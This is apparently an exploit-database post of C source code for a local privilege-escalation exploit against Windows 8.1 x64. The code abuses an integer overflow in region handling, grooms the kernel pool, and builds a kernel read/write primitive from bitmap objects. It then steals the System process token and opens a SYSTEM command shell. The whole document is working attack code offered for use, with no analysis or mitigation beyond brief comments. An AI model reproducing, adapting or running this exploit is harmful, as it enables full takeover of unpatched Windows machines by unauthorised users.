Microsoft Windows 8.1 (x64) RGNOBJ Integer Overflow
Posted on 12 January 2017
#include <Windows.h> #include <wingdi.h> #include <stdio.h> #include <winddi.h> #include <time.h> #include <stdlib.h> #include <Psapi.h> HANDLE hWorker, hManager; BYTE *bits; //dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token typedef struct { DWORD UniqueProcessIdOffset; DWORD TokenOffset; } VersionSpecificConfig; VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1 void AllocateClipBoard2(unsigned int size) { BYTE *buffer; buffer = malloc(size); memset(buffer, 0x41, size); buffer[size - 1] = 0x00; const size_t len = size; HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len); memcpy(GlobalLock(hMem), buffer, len); GlobalUnlock(hMem); //OpenClipboard(0); //EmptyClipboard(); SetClipboardData(CF_TEXT, hMem); //CloseClipboard(); //GlobalFree(hMem); } static HBITMAP bitmaps[5000]; void fungshuei() { HBITMAP bmp; // Allocating 5000 Bitmaps of size 0xf80 leaving 0x80 space at end of page. for (int k = 0; k < 5000; k++) { //bmp = CreateBitmap(1685, 2, 1, 8, NULL); //800 = 0x8b0 820 = 0x8e0 1730 = 0x1000 1700 = 0xfc0 1670 = 0xf70 bmp = CreateBitmap(1670, 2, 1, 8, NULL); // 1680 = 0xf80 1685 = 0xf90 allocation size 0xfa0 bitmaps[k] = bmp; } HACCEL hAccel, hAccel2; LPACCEL lpAccel; // Initial setup for pool fengshui. lpAccel = (LPACCEL)malloc(sizeof(ACCEL)); SecureZeroMemory(lpAccel, sizeof(ACCEL)); // Allocating 7000 accelerator tables of size 0x40 0x40 *2 = 0x80 filling in the space at end of page. HACCEL *pAccels = (HACCEL *)malloc(sizeof(HACCEL) * 7000); HACCEL *pAccels2 = (HACCEL *)malloc(sizeof(HACCEL) * 7000); for (INT i = 0; i < 7000; i++) { hAccel = CreateAcceleratorTableA(lpAccel, 1); hAccel2 = CreateAcceleratorTableW(lpAccel, 1); pAccels[i] = hAccel; pAccels2[i] = hAccel2; } // Delete the allocated bitmaps to free space at beiginig of pages for (int k = 0; k < 5000; k++) { DeleteObject(bitmaps[k]); } //allocate Gh04 5000 region objects of size 0xbc0 which will reuse the free-ed bitmaps memory. for (int k = 0; k < 5000; k++) { CreateEllipticRgn(0x79, 0x79, 1, 1); //size = 0xbc0 } // Allocate Gh05 5000 bitmaps which would be adjacent to the Gh04 objects previously allocated for (int k = 0; k < 5000; k++) { bmp = CreateBitmap(0x52, 1, 1, 32, NULL); //size = 3c0 bitmaps[k] = bmp; } // Allocate 17500 clipboard objects of size 0x60 to fill any free memory locations of size 0x60 for (int k = 0; k < 1700; k++) { //1500 AllocateClipBoard2(0x30); } // delete 2000 of the allocated accelerator tables to make holes at the end of the page in our spray. for (int k = 2000; k < 4000; k++) { DestroyAcceleratorTable(pAccels[k]); DestroyAcceleratorTable(pAccels2[k]); } } void SetAddress(BYTE* address) { for (int i = 0; i < sizeof(address); i++) { bits[0xdf0 + i] = address[i]; } SetBitmapBits(hManager, 0x1000, bits); } void WriteToAddress(BYTE* data) { SetBitmapBits(hWorker, sizeof(data), data); } LONG ReadFromAddress(ULONG64 src, BYTE* dst, DWORD len) { SetAddress((BYTE *)&src); return GetBitmapBits(hWorker, len, dst); } // Get base of ntoskrnl.exe ULONG64 GetNTOsBase() { ULONG64 Bases[0x1000]; DWORD needed = 0; ULONG64 krnlbase = 0; if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) { krnlbase = Bases[0]; } return krnlbase; } // Get EPROCESS for System process ULONG64 PsInitialSystemProcess() { // load ntoskrnl.exe ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe"); // get address of exported PsInitialSystemProcess variable ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess"); FreeLibrary((HMODULE)ntos); ULONG64 res = 0; ULONG64 ntOsBase = GetNTOsBase(); // subtract addr from ntos to get PsInitialSystemProcess offset from base if (ntOsBase) { ReadFromAddress(addr - ntos + ntOsBase, (BYTE *)&res, sizeof(ULONG64)); } return res; } // Get EPROCESS for current process ULONG64 PsGetCurrentProcess() { ULONG64 pEPROCESS = PsInitialSystemProcess();// get System EPROCESS // walk ActiveProcessLinks until we find our Pid LIST_ENTRY ActiveProcessLinks; ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY)); ULONG64 res = 0; while (TRUE) { ULONG64 UniqueProcessId = 0; // adjust EPROCESS pointer for next entry pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64); // get pid ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64)); // is this our pid? if (GetCurrentProcessId() == UniqueProcessId) { res = pEPROCESS; break; } // get next entry ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY)); // if next same as last, we reached the end if (pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64)) break; } return res; } void main(int argc, char* argv[]) { HDC hdc = GetDC(NULL); HDC hMemDC = CreateCompatibleDC(hdc); HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL); HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap); static POINT points[0x3fe01]; for (int l = 0; l < 0x3FE00; l++) { points[l].x = 0x5a1f; points[l].y = 0x5a1f; } points[2].y = 20; points[0x3FE00].x = 0x4a1f; points[0x3FE00].y = 0x6a1f; if (!BeginPath(hMemDC)) { fprintf(stderr, "[!] BeginPath() Failed: %x ", GetLastError()); } for (int j = 0; j < 0x156; j++) { if (j > 0x1F && points[2].y != 0x5a1f) { points[2].y = 0x5a1f; } if (!PolylineTo(hMemDC, points, 0x3FE01)) { fprintf(stderr, "[!] PolylineTo() Failed: %x ", GetLastError()); } } EndPath(hMemDC); //Kernel Pool Fung=Shuei fungshuei(); //getchar(); fprintf(stdout, "[+] Trigerring Exploit. "); if (!FillPath(hMemDC)) { fprintf(stderr, "[!] FillPath() Failed: %x ", GetLastError()); } printf("%s ", "Done filling."); HRESULT res; VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!fake) { fprintf(stderr, "VirtualAllocFailed. %x ", GetLastError()); } memset(fake, 0x1, 0x100); bits = malloc(0x1000); memset(bits, 0x42, 0x1000); for (int k=0; k < 5000; k++) { res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1 if (res > 0x150) { fprintf(stdout, "GetBitmapBits Result. %x index: %d ", res, k); hManager = bitmaps[k]; hWorker = bitmaps[k + 1]; // Get Gh05 header to fix overflown header. static BYTE Gh04[0x9]; fprintf(stdout, " Gh04 header: "); for (int i = 0; i < 0x10; i++){ Gh04[i] = bits[0x1d0 + i]; fprintf(stdout, "%02x", bits[0x1d0 + i]); } // Get Gh05 header to fix overflown header. static BYTE Gh05[0x9]; fprintf(stdout, " Gh05 header: "); for (int i = 0; i < 0x10; i++) { Gh05[i] = bits[0xd90 + i]; fprintf(stdout, "%02x", bits[0xd90 + i]); } // Address of Overflown Gh04 object header static BYTE addr1[0x7]; fprintf(stdout, " Previous page Gh04 (Leaked address): "); for (int j = 0; j < 0x8; j++) { addr1[j] = bits[0x210 + j]; fprintf(stdout, "%02x", bits[0x210 + j]); } //Get pvscan0 address of second Gh05 object static BYTE* pvscan[0x07]; fprintf(stdout, " Pvsca0: "); for (int i = 0; i < 0x8; i++) { pvscan[i] = bits[0xdf0 + i]; fprintf(stdout, "%02x", bits[0xdf0 + i]); } // Calculate address to overflown Gh04 object header. addr1[0x0] = 0; int u = addr1[0x1]; u = u - 0x10; addr1[1] = u; //Fix overflown Gh04 object Header SetAddress(addr1); WriteToAddress(Gh04); // Calculate address to overflown Gh05 object header. addr1[0] = 0xc0; int y = addr1[1]; y = y + 0xb; addr1[1] = y; //Fix overflown Gh05 object Header SetAddress(addr1); WriteToAddress(Gh05); // get System EPROCESS ULONG64 SystemEPROCESS = PsInitialSystemProcess(); //fprintf(stdout, " %x ", SystemEPROCESS); ULONG64 CurrentEPROCESS = PsGetCurrentProcess(); //fprintf(stdout, " %x ", CurrentEPROCESS); ULONG64 SystemToken = 0; // read token from system process ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8); // write token to current process ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset; SetAddress((BYTE *)&CurProccessAddr); WriteToAddress((BYTE *)&SystemToken); // Done and done. We're System :) system("cmd.exe"); break; } if (res == 0) { fprintf(stderr, "GetBitmapBits failed. %x ", GetLastError()); } } getchar(); //clean up DeleteObject(bitobj); DeleteObject(bitmap); DeleteDC(hMemDC); ReleaseDC(NULL, hdc); VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE); //free(points); }